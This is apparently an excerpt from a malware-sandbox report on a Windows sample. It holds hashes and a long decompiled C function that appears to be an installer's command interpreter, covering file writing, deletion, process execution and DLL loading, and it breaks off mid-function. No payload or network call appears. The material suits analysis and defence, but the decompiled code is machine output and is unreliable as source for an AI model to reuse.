                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004015A0, Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E004015A0(void _a4, char _a7) {
				RECT* _v8;
				long _v12;
				short _v16;
				long _v20;
				long _v24;
				signed int _v28;
				struct _FILETIME _v36;
				signed int _v40;
				long _v44;
				signed int _v48;
				void _v52;
				int _v56;
				DWORD* _v60;
				signed char _v61;
				intOrPtr _v70;
				struct _SHFILEOPSTRUCTW _v96;
				char _v352;
				struct _WIN32_FIND_DATAW _v944;
				short _t504;
				signed int _t508;
				signed int _t514;
				signed int _t519;

				_t514 = 7;
				_t504 = memcpy( &_v52, _a4, _t514 << 2);
				_t519 = _v48;
				_v16 = _t504;
				 *0x40c0e4 =  &_v48;
				_t508 = _v52 + 0xfffffffe;
				_v8 = 0;
				if(_t508 > 0x47) {
					L430:
					 *0x47eb68 = _v8 +  *0x47eb68;
					L431:
					return 0;
				}
				switch( *((intOrPtr*)(_t508 * 4 +  &M004030F8))) {
					case 0:
						E004062CF(L"Jump: %d", _t519);
						return _v48;
					case 1:
						E0040145C(__edx, 0) = E004062CF(L"Aborting: \"%s\"", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L4;
					case 2:
						 *0x476a74 =  *0x476a74 + 1;
						__eflags = _v16;
						if(_v16 != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						_t15 = E0040137E(__edx) - 1; // -1
						__esi = _t15;
						__eax = E004062CF(L"Call: %d", _t15);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						return E0040139D(_t15);
					case 4:
						E0040145C(__edx, 0) = E004062CF(L"detailprint: %s", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L10;
					case 5:
						__ecx = 0;
						__esi = E00401446(0);
						__eax = E004062CF(L"Sleep(%d)", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __esi - 1;
						if(__esi <= 1) {
							__esi = 0;
							__esi = 1;
							__eflags = 1;
						}
						Sleep(__esi);
						goto L430;
					case 6:
						_push(L"BringToFront");
						__eax = E004062CF();
						_pop(__ecx);
						__eax = SetForegroundWindow(_v16);
						goto L430;
					case 7:
						__eax =  *0x476a80;
						__esi = ShowWindow;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx);
							__edx = _v48;
						}
						__eax =  *0x476a6c;
						__eflags = __eax - __ebx;
						if(__eax != __ebx) {
							__eax = ShowWindow(__eax, __edx);
						}
						goto L430;
					case 8:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						__esi = __eax;
						__eax = E004062CF(L"SetFileAttributes: \"%s\":%08X", __esi);
						__eax = SetFileAttributesW(__esi, _v44);
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						} else {
							_v8 = 1;
							_push(L"SetFileAttributes failed.");
							goto L26;
						}
					case 9:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						_a4 = __eax;
						__eax = E004062CF(L"CreateDirectory: \"%s\" (%d)", __eax);
						__esi = E00405D85(_a4);
						__eflags = __esi;
						if(__esi == 0) {
							L37:
							_push(0x4100f0);
							__eflags = _v44 - __ebx;
							if(_v44 == __ebx) {
								_push(0xfffffff5);
								goto L10;
							} else {
								_push(0xffffffe6);
								E00404F9E() = E00406035(0x4d70b0, _a4);
								__eax = SetCurrentDirectoryW(_a4);
								goto L430;
							}
						} else {
							goto L29;
						}
						do {
							L29:
							__esi = E00405D32(__esi, 0x5c);
							__edi =  *__esi & 0x0000ffff;
							__eax = 0;
							 *__esi = __ax; // executed
							__eax = CreateDirectoryW(_a4, __ebx); // executed
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E004062CF(L"CreateDirectory: \"%s\" created", _a4);
								L35:
								_pop(__ecx);
								_pop(__ecx);
								goto L36;
							}
							__eax = GetLastError();
							__eflags = __eax - 0xb7;
							if(__eax == 0xb7) {
								__eax = GetFileAttributesW(_a4); // executed
								__eflags = __al & 0x00000010;
								if((__al & 0x00000010) != 0) {
									goto L36;
								} else {
									__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" - a file already exists", _a4);
									_v8 =  &(_v8->left);
									goto L35;
								}
							} else {
								_push(GetLastError());
								__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" (err=%d)", _a4);
								_v8 =  &(_v8->left);
							}
							L36:
							 *__esi = __di;
							__esi =  &(__esi[1]);
							__eflags = __di - __bx;
						} while (__di != __bx);
						goto L37;
					case 0xa:
						__esi = E0040145C(__edx, 0);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							_push(_v40);
							__eax = E004062CF(L"IfFileExists: file \"%s\" does not exist, jumping %d", __esi);
							goto L44;
						} else {
							_push(_v44);
							__eax = E004062CF(L"IfFileExists: file \"%s\" exists, jumping %d", __esi);
							goto L42;
						}
					case 0xb:
						__eax = __edx;
						__eflags = _v40;
						if(_v40 != 0) {
							__ecx =  *(0x47eb20 + __eax * 4);
							 *(0x47eb60 + __eax * 4) =  *(0x47eb20 + __eax * 4);
						} else {
							__ecx =  *(0x47eb60 + __eax * 4);
							 *(0x47eb20 + __eax * 4) =  *(0x47eb60 + __eax * 4);
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							__ecx = _v48;
							 *(0x47eb60 + _v48 * 4) = __eax;
						}
						goto L430;
					case 0xc:
						__esi = _v40;
						__esi = 0x47eb60 + _v40 * 4;
						__ecx =  *__esi;
						__eax = 0;
						__eflags = __ecx;
						__eax = 0 | __ecx == 0x00000000;
						 *__esi = __ecx;
						return __eax;
					case 0xd:
						_push( *((intOrPtr*)(0x47eb60 + __ecx * 4)));
						goto L428;
					case 0xe:
						__esi = E0040145C(__edx, 0xffffffd0);
						_a4 = E0040145C(__edx, 0xffffffdf);
						__edi = E0040145C(__edx, 0x13);
						__eax = E004062CF(L"Rename: %s", __edi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = MoveFileW(__esi, _a4);
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = _v40;
							if(_v40 == 0) {
								L50:
								_push(__edi);
								_push(L"Rename failed: %s");
								goto L51;
							}
							__eax = E00406301(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L50;
							} else {
								E00406C94(__esi, _a4) = E00404F9E(0xffffffe4, 0x4100f0);
								_push(__edi);
								_push(L"Rename on reboot: %s");
								goto L52;
							}
						} else {
							_push(0x4100f0);
							_push(0xffffffe3);
							goto L10;
						}
					case 0xf:
						__esi = E0040145C(__edx, 0);
						__eax =  &_a4;
						__eax = GetFullPathNameW(__esi, 0x2004, __edi,  &_a4);
						__eflags = __eax;
						if(__eax == 0) {
							L58:
							__eax = 0;
							__eflags = 0;
							 *__edi = __ax;
							_v8 = 1;
							L59:
							__eflags = _v40 - __ebx;
							if(_v40 == __ebx) {
								__eax = GetShortPathNameW(__edi, __edi, 0x2004);
							}
							goto L430;
						}
						__eax = _a4;
						__eflags = __eax - __esi;
						if(__eax <= __esi) {
							goto L59;
						}
						__eflags =  *__eax - __bx;
						if( *__eax == __bx) {
							goto L59;
						}
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							goto L58;
						}
						__eax = E00406035(_a4, __eax);
						goto L59;
					case 0x10:
						__eax = E0040145C(__edx, 0xffffffff);
						__ecx =  &_a4;
						__eax = SearchPathW(0, __eax, 0, 0x2004, __esi,  &_a4);
						goto L62;
					case 0x11:
						__eax = E0040145C(__edx, 0xffffffef);
						__eax = E00405EAB(__ecx, __esi, __eax); // executed
						goto L65;
					case 0x12:
						__esi = E0040145C(__edx, 0x31);
						__eax = _v48;
						__ecx = __eax;
						__eax = __eax >> 3;
						_push(__esi);
						__eax = __eax & 0x00000002;
						__ecx = __ecx & 0x00000007;
						_push(__eax);
						_v56 = __esi;
						_a4 = __ecx;
						__eax = E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", __ecx);
						__eax = E00405D51(__esi);
						_push(__esi);
						__esi = L"install";
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00406035(__esi, 0x4d70b0);
							__eax = lstrcatW(__eax, ??);
						} else {
							_push(__esi);
							__eax = E00406035();
						}
						__eax = E00406064(__esi);
						__edi = 0x4140f8;
						while(1) {
							__eflags = _a4 - 3;
							if(_a4 >= 3) {
								__eax = E00406301(__esi);
								__ecx = 0;
								__eflags = __eax - __ebx;
								if(__eax != __ebx) {
									__ecx =  &_v36;
									__eax =  &(__eax[0xa]);
									__eflags = __eax;
									__ecx = __eax;
								}
								_a4 = _a4 + 0xfffffffd;
								_a4 + 0xfffffffd | 0x80000000 = (_a4 + 0xfffffffd | 0x80000000) & __ecx;
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx);
								asm("sbb eax, eax");
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx) + 1;
								__eflags = __eax;
								_a4 = __eax;
							}
							__eflags = _a4 - __ebx;
							if(_a4 == __ebx) {
								__eax = E00405E5C(__esi);
							}
							__eax = 0;
							__eflags = _a4 - 1;
							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
							__eax = E00405E7C(__esi, 0x40000000, (__eflags != 0) + 1);
							_v12 = __eax;
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								break;
							}
							__eflags = _a4 - __ebx;
							if(_a4 != __ebx) {
								__eax = E00404F9E(0xffffffe2, _v56);
								__eflags = _a4 - 2;
								if(_a4 == 2) {
									_v8 = 1;
								}
								_push(_a4);
								_push(__esi);
								_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
								goto L87;
							}
							__eax = E004062CF(L"File: error creating \"%s\"", __esi);
							_pop(__ecx);
							_pop(__ecx);
							E00406035(__edi, 0x47f000) = E00406035(0x47f000, __esi);
							E00406831(__ebx, __edi, __esi, 0x4100f0, _v28) = E00406035(0x47f000, __edi);
							_v48 = _v48 >> 3;
							__eax = E00405CCC(0x4100f0, _v48 >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
							if(__eax != 0) {
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									_push(L"File: error, user cancel");
									__eax = E004062CF();
									 *0x47eb68 =  *0x47eb68 + 1;
									_pop(__ecx);
									goto L431;
								}
								_push(L"File: error, user abort");
								__eax = E004062CF();
								_pop(__ecx);
								_push(__esi);
								_push(0xfffffffa);
								L4:
								__eax = E00404F9E();
								goto L5;
							}
							_push(L"File: error, user retry");
							__eax = E004062CF();
							_pop(__ecx);
						}
						__eax = E00404F9E(0xffffffea, _v56);
						 *0x47eb94 =  *0x47eb94 + 1;
						__eax = E0040337F(_v40, _v12, __ebx, __ebx); // executed
						 *0x47eb94 =  *0x47eb94 - 1;
						__edi = __eax;
						_push(__esi);
						__eax = E004062CF(L"File: wrote %d to \"%s\"", __edi);
						__eflags = _v36.dwLowDateTime - 0xffffffff;
						if(_v36.dwLowDateTime != 0xffffffff) {
							L92:
							 &_v36 = SetFileTime(_v12,  &_v36, __ebx,  &_v36);
							L93:
							__eax = FindCloseChangeNotification(_v12); // executed
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								goto L430;
							}
							__eflags = __edi - 0xfffffffe;
							if(__edi != 0xfffffffe) {
								__eax = E00406831(__ebx, __edi, __esi, __esi, 0xffffffee);
							} else {
								E00406831(__ebx, __edi, __esi, __esi, 0xffffffe9) = lstrcatW(__esi, _v56);
							}
							__eax = E004062CF(L"%s", __esi);
							_pop(__ecx);
							_pop(__ecx);
							_push(0x200010);
							_push(__esi);
							goto L98;
						}
						__eflags = _v36.dwHighDateTime - 0xffffffff;
						if(_v36.dwHighDateTime == 0xffffffff) {
							goto L93;
						}
						goto L92;
					case 0x13:
						__eax = E0040145C(__edx, 0);
						__esi = __eax;
						_push(__eax);
						_push(L"Delete: \"%s\"");
						goto L100;
					case 0x14:
						__eax = E0040145C(__edx, 0x31);
						__esi = __eax;
						_push(__eax);
						__eax = E004062CF(L"MessageBox: %d,\"%s\"", _v48);
						__eax = E00405CCC(__esi, _v48);
						__eflags = __eax;
						if(__eax == 0) {
							goto L67;
						}
						__eflags = __eax - _v40;
						if(__eax != _v40) {
							__eflags = __eax - _v36.dwHighDateTime;
							if(__eax != _v36.dwHighDateTime) {
								goto L430;
							}
							__eax = _v28;
							return _v28;
						}
						goto L103;
					case 0x15:
						__eax = E0040145C(__edx, 0xfffffff0);
						__esi = __eax;
						_push(__eax);
						_push(L"RMDir: \"%s\"");
						L100:
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00406CC7(__eflags, __esi, _v44); // executed
						goto L430;
					case 0x16:
						__eax = E0040145C(__edx, 1);
						__eax = lstrlenW(__eax);
						goto L427;
					case 0x17:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(3);
						_pop(__ecx);
						_a4 = __eax;
						__edi = E00401446(__ecx);
						__eax = E0040145C(__edx, 1);
						__ecx = 0;
						_v96.hNameMappings = __eax;
						 *__esi = __cx;
						__eflags = _v40;
						if(_v40 == 0) {
							L110:
							__eax = lstrlenW(__eax);
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								L112:
								__eflags = __edi - __eax;
								if(__edi > __eax) {
									__edi = __eax;
								}
								_v96.hNameMappings = _v96.hNameMappings + __edi * 2;
								__eax = E00406035(__esi, _v96.hNameMappings + __edi * 2);
								__edi = _a4;
								__eflags = __edi - __ebx;
								if(__eflags != 0) {
									if(__eflags < 0) {
										__edi = __edi + lstrlenW(__esi);
										__eflags = __edi;
										if(__edi < 0) {
											__edi = __ebx;
										}
									}
									__eflags = __edi - 0x2004;
									if(__edi < 0x2004) {
										__eax = 0;
										__esi[__edi] = __ax;
									}
								}
								goto L430;
							}
							__edi = __edi + __eax;
							__eflags = __edi;
							if(__edi < 0) {
								goto L430;
							}
							goto L112;
						}
						__eflags = _a4;
						if(_a4 == 0) {
							goto L430;
						}
						goto L110;
					case 0x18:
						__esi = E0040145C(__edx, 0x20);
						_push(E0040145C(__edx, 0x31));
						_push(__esi);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = lstrcmpW();
						} else {
							__eax = lstrcmpiW();
						}
						__eflags = __eax;
						if(__eax != 0) {
							goto L103;
						} else {
							goto L44;
						}
					case 0x19:
						__edi = E0040145C(__edx, 1);
						__eax = ExpandEnvironmentStringsW(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							L128:
							__eax = 0;
							__eflags = 0;
							_v8 = 1;
							 *__esi = __ax;
							L129:
							__eax = 0;
							__esi[0x2003] = __ax;
							goto L430;
						}
						__eflags = _v40;
						if(_v40 == 0) {
							goto L129;
						}
						__eax = lstrcmpW(__edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							goto L129;
						}
						goto L128;
					case 0x1a:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__eax = E00401446(1);
						__eflags = _v28;
						if(_v28 != 0) {
							__eflags = __esi - __eax;
							if(__eflags < 0) {
								L103:
								__eax = _v36.dwLowDateTime;
								return _v36.dwLowDateTime;
							}
							if(__eflags <= 0) {
								goto L44;
							}
							L133:
							__eax = _v36.dwHighDateTime;
							return _v36.dwHighDateTime;
						}
						__eflags = __esi - __eax;
						if(__eflags < 0) {
							goto L103;
						}
						if(__eflags <= 0) {
							goto L44;
						}
						goto L133;
					case 0x1b:
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						__ecx = E00401446(1);
						__eax = _v36.dwLowDateTime;
						__eflags = __eax - 0xc;
						if(__eax > 0xc) {
							L159:
							_push(__edi);
							goto L428;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00403218))) {
							case 0:
								__edi = __edi + __ecx;
								goto L159;
							case 1:
								__edi = __edi - __ecx;
								goto L159;
							case 2:
								__edi = __edi * __ecx;
								goto L159;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L144;
								}
								__eax = __edi;
								asm("cdq");
								_t134 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t134;
								goto L149;
							case 4:
								__edi = __edi | __ecx;
								goto L159;
							case 5:
								__edi = __edi & __ecx;
								goto L159;
							case 6:
								__edi = __edi ^ __ecx;
								goto L159;
							case 7:
								__eax = 0;
								__eflags = __edi;
								_t139 = __edi == 0;
								__eflags = _t139;
								__eax = 0 | _t139;
								L149:
								__edi = __eax;
								goto L159;
							case 8:
								__eflags = __edi;
								if(__edi != 0) {
									goto L152;
								}
								goto L151;
							case 9:
								__eflags = __edi;
								if(__edi != 0) {
									L151:
									__eflags = __ecx - __ebx;
									if(__ecx == __ebx) {
										goto L154;
									}
									L152:
									__edi = 0;
									__edi = 1;
									goto L159;
								}
								L154:
								__edi = 0;
								goto L159;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L144:
									__edi = 0;
									_v8 = 1;
									goto L159;
								}
								__eax = __edi;
								asm("cdq");
								_t141 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t141;
								__edi = _t141;
								goto L159;
							case 0xb:
								__edi = __edi << __cl;
								goto L159;
							case 0xc:
								__edi = __edi >> __cl;
								goto L159;
						}
					case 0x1c:
						__eax = E0040145C(__edx, 1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						E00401446(__ecx) = wsprintfW(__esi, __edi, __eax);
						goto L88;
					case 0x1d:
						__eax = _v40;
						__edi =  *0x40c0e0; // 0x0
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = GlobalAlloc(0x40, 0x400c); // executed
								__esi = __eax;
								_t148 =  &(__esi[2]); // 0x4
								_t148 = E00406831(__ebx, __edi, __esi, _t148, _v48);
								__eax =  *0x40c0e0; // 0x0
								 *__esi = __eax;
								 *0x40c0e0 = __esi;
								goto L430;
							}
							__eflags = __edi;
							if(__edi != 0) {
								_t146 = __edi + 4; // 0x4
								_t146 = E00406035(__esi, _t146);
								__eax =  *__edi;
								 *0x40c0e0 =  *__edi;
								_push(__edi);
								goto L220;
							}
							_push(L"Pop: stack empty");
							__eax = E004062CF();
							_pop(__ecx);
							goto L67;
						} else {
							goto L162;
						}
						while(1) {
							L162:
							__eax = __eax - 1;
							__eflags = __edi - __ebx;
							if(__edi == __ebx) {
								break;
							}
							__edi =  *__edi;
							__eflags = __eax - __ebx;
							if(__eax != __ebx) {
								continue;
							}
							__eflags = __edi - __ebx;
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"install";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								goto L386;
							}
							break;
						}
						__eax = E004062CF(L"Exch: stack < %d elements", _v40);
						_pop(__ecx);
						_pop(__ecx);
						goto L166;
					case 0x1e:
						_push(3);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(4);
						_pop(__ecx);
						_v56 = __eax;
						__eax = E00401446(__ecx);
						__eflags = _v28 & 0x00000001;
						_a4 = __eax;
						if((_v28 & 0x00000001) != 0) {
							_v56 = E0040145C(__edx, 0x33);
						}
						__eflags = _v28 & 0x00000002;
						if((_v28 & 0x00000002) != 0) {
							_a4 = E0040145C(__edx, 0x44);
						}
						__eflags = _v52 - 0x21;
						if(_v52 != 0x21) {
							__edi = E0040145C(__edx, 1);
							__eax = E0040145C(__edx, 0x12);
							 *__eax & 0x0000ffff =  ~( *__eax & 0x0000ffff);
							asm("sbb ecx, ecx");
							__ecx =  ~( *__eax & 0x0000ffff) & __eax;
							 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
							asm("sbb eax, eax");
							__eax =  ~( *__edi & 0x0000ffff) & __edi;
							__eflags = __eax;
							__eax = FindWindowExW(_v56, _a4, __eax, __ecx);
							goto L182;
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							_push(2);
							_pop(__ecx);
							__edi = __eax;
							__eax = E00401446(1);
							__ecx = _v28;
							__ecx = _v28 >> 2;
							__eflags = __ecx - __ebx;
							if(__ecx == __ebx) {
								__eax = SendMessageW(__edi, __eax, _v56, _a4);
								L182:
								_v12 = __eax;
								L183:
								__eflags = _v48 - __ebx;
								if(_v48 < __ebx) {
									goto L430;
								}
								_push(_v12);
								goto L428;
							}
							__edx =  &_v12;
							__eax = SendMessageTimeoutW(__edi, __eax, _v56, _a4, __ebx, __ecx,  &_v12);
							__eax =  ~__eax;
							asm("sbb eax, eax");
							_v8 = __eax;
							goto L183;
						}
					case 0x1f:
						__ecx = 0;
						__eax = E00401446(0);
						__eax = IsWindow(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							L44:
							__eax = _v40;
							return _v40;
						}
						L42:
						__eax = _v44;
						return _v44;
					case 0x20:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						__eax = GetDlgItem(__eax, __eax);
						goto L427;
					case 0x21:
						 *0x47eae8 =  *0x47eae8;
						__ecx = 0;
						E00401446(0) = SetWindowLongW(__eax, 0xffffffeb,  *0x47eae8);
						goto L430;
					case 0x22:
						__esi = GetDlgItem(_v16, __ecx);
						 &(_v96.pTo) = GetClientRect(__esi,  &(_v96.pTo));
						_v96.hNameMappings = _v96.hNameMappings * _v40;
						_v96.fAnyOperationsAborted = _v96.fAnyOperationsAborted * _v40;
						__eax = E0040145C(__edx, 0);
						__eax = LoadImageW(0, __eax, 0, _v96.fAnyOperationsAborted * _v40, _v96.hNameMappings * _v40, 0x10);
						__eax = SendMessageW(__esi, 0x172, 0, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = DeleteObject(__eax);
						}
						goto L430;
					case 0x23:
						_push(0x48);
						__eax = GetDC(_v16);
						_push(__eax);
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__eax = MulDiv(__eax, ??, ??);
						_push(3);
						__eax =  ~__eax;
						_pop(__ecx);
						0x420110->lfHeight = __eax;
						 *0x420120 = E00401446(__ecx);
						__al = _v36.dwHighDateTime;
						__al = __al & 0x00000001;
						 *0x420124 = __al & 0x00000001;
						__cl = __al;
						__cl = __al & 0x00000002;
						__al = __al & 0x00000004;
						 *0x420125 = __cl;
						 *0x420126 = __al;
						 *0x420127 = 1;
						__eax = E00406831(__ebx, __edi, __esi, 0x42012c, _v44);
						__eax = CreateFontIndirectW(0x420110);
						goto L427;
					case 0x24:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__edi = E00401446(1);
						__eflags = _v40;
						if(_v40 != 0) {
							_push(L"HideWindow");
							__eax = E004062CF();
							_pop(__ecx);
						}
						_push(__edi);
						_push(__esi);
						__eflags = _v36.dwLowDateTime - __ebx;
						if(_v36.dwLowDateTime != __ebx) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow();
						}
						goto L430;
					case 0x25:
						__esi = E0040145C(__edx, 0);
						__ebx = E0040145C(__edx, 0x31);
						__edi = E0040145C(__edx, 0x22);
						E0040145C(__edx, 0x15) = E00404F9E(0xffffffec, 0x4100f0);
						 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
						asm("sbb eax, eax");
						 ~( *__edi & 0x0000ffff) & __edi =  *__esi & 0x0000ffff;
						__eax =  ~( *__esi & 0x0000ffff);
						asm("sbb eax, eax");
						__eax =  ~( *__esi & 0x0000ffff) & __esi;
						__eax = ShellExecuteW(_v16,  ~( *__esi & 0x0000ffff) & __esi, __ebx,  ~( *__edi & 0x0000ffff) & __edi, 0x4d70b0, _v36.dwLowDateTime);
						__eflags = __eax - 0x21;
						if(__eax >= 0x21) {
							_push(__edi);
							_push(__ebx);
							__eax = E004062CF(L"ExecShell: success (\"%s\": file:\"%s\" params:\"%s\")", __esi);
							goto L430;
						}
						_push(__eax);
						_push(__edi);
						_push(__ebx);
						__eax = E004062CF(L"ExecShell: warning: error (\"%s\": file:\"%s\" params:\"%s\")=%d", __esi);
						goto L67;
					case 0x26:
						__esi = E0040145C(__edx, 0);
						__eax = E004062CF(L"Exec: command=\"%s\"", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00404F9E(0xffffffeb, __esi);
						__eax = E00405C6B(__esi);
						_a4 = __eax;
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							_push(L"Exec: failed createprocess (\"%s\")");
							L51:
							_v8 = 1;
							goto L52;
						}
						_push(L"Exec: success (\"%s\")");
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eflags = _v40;
						if(_v40 == 0) {
							L209:
							_push(_a4);
							goto L313;
						}
						__esi = WaitForSingleObject;
						while(1) {
							__eax = WaitForSingleObject(_a4, 0x64);
							__eflags = __eax - 0x102;
							if(__eax != 0x102) {
								break;
							}
							__eax = E0040635E(0xf);
						}
						 &_v20 = GetExitCodeProcess(_a4,  &_v20);
						__eflags = _v44 - __ebx;
						if(_v44 < __ebx) {
							__eflags = _v20 - __ebx;
							if(_v20 != __ebx) {
								_v8 = 1;
							}
						} else {
							__eax = E00405F7D(__edi, _v20);
						}
						goto L209;
					case 0x27:
						__eax = E0040145C(__edx, 2);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = 0;
							 *__esi = __ax;
							 *__edi = __ax;
							goto L67;
						}
						__ebx = __eax;
						__eax = E00405F7D(__edi,  *((intOrPtr*)(__ebx + 0x14)));
						_push( *((intOrPtr*)(__ebx + 0x18)));
						goto L428;
					case 0x28:
						__eax = E0040145C(__edx, 0xffffffee);
						__ecx =  &_v24;
						_v96.hNameMappings = __eax;
						__eax = GetFileVersionInfoSizeW(__eax,  &_v24);
						__ecx = 0;
						 *__esi = __cx;
						_v20 = __eax;
						 *__edi = __cx;
						_v8 = 1;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GlobalAlloc(0x40, __eax);
						_a4 = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GetFileVersionInfoW(_v96.hNameMappings, 0, _v20, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							 &(_v96.hNameMappings) =  &_v12;
							__eax = VerQueryValueW(_a4, "\\",  &_v12,  &(_v96.hNameMappings));
							__eflags = __eax;
							if(__eax != 0) {
								_v12 = E00405F7D(__esi,  *((intOrPtr*)(_v12 + 8)));
								_v12 = E00405F7D(__edi,  *((intOrPtr*)(_v12 + 0xc)));
								_v8 = 0;
							}
						}
						goto L219;
					case 0x29:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407224(__eflags, __edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFVersionString(%s) returned %s");
						goto L87;
					case 0x2a:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407296(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFFontName(%s) returned %s");
						goto L87;
					case 0x2b:
						_v8 = 1;
						__eflags =  *0x47eb98;
						if( *0x47eb98 < 0) {
							__eax = E00404F9E(0xffffffe7, 0x4100f0);
							_push(L"Error registering DLL: Could not initialize OLE");
							L26:
							__eax = E004062CF();
							goto L27;
						}
						__edi = E0040145C(__edx, 0xfffffff0);
						_v12 = E0040145C(__edx, 1);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime == 0) {
							L230:
							__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
							_a4 = __eax;
							__eflags = __eax - __ebx;
							if(__eax == __ebx) {
								__eax = E00404F9E(0xfffffff6, 0x4100f0);
								_push(__edi);
								_push(L"Error registering DLL: Could not load %s");
								goto L52;
							}
							L231:
							__esi = E00406391(_a4, _v12);
							__eflags = __esi - __ebx;
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7, _v12);
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s", _v12);
							} else {
								_v8 = __ebx;
								__eflags = _v40 - __ebx;
								if(_v40 == __ebx) {
									_push("`�G");
									_push(0x40c0e0);
									_push(0x47f000);
									_push(0x2004);
									_push(_v16);
									__eax =  *__esi(); // executed
									__esp = __esp + 0x14;
								} else {
